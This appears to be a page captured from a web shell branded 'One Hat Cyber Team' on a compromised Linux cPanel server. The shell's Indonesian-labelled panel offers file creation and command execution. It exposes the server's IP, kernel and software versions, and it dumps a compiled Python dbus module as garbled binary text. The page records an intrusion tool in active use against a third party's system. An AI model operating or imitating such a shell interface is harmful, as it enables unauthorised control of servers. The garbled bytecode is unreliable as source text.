⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib64
/
python2.7
/
site-packages
/
dbus
/
View File Name :
gobject_service.pyo
� 毖Sc @ s� d Z d d l Z d d l m Z e e d � e d d �d e j k r] d d l m Z n d d l Z d d l Z d e j j e j j f d � � YZ d e j e j j f d � � YZ d S( s: Support code for implementing D-Bus services via GObjects.i����N( t warns� dbus.gobject_service is deprecated, and is not available under Python 3. Porting from gobject (PyGObject 2) to gi.repository.GObject (PyGObject 3), and using dbus.gi_service instead of dbus.gobject_service, is recommended. t stackleveli t gi( t GObjectt ExportedGObjectTypec B s e Z d Z d � Z RS( s� A metaclass which inherits from both GObjectMeta and `dbus.service.InterfaceType`. Used as the metaclass for `ExportedGObject`. c C s<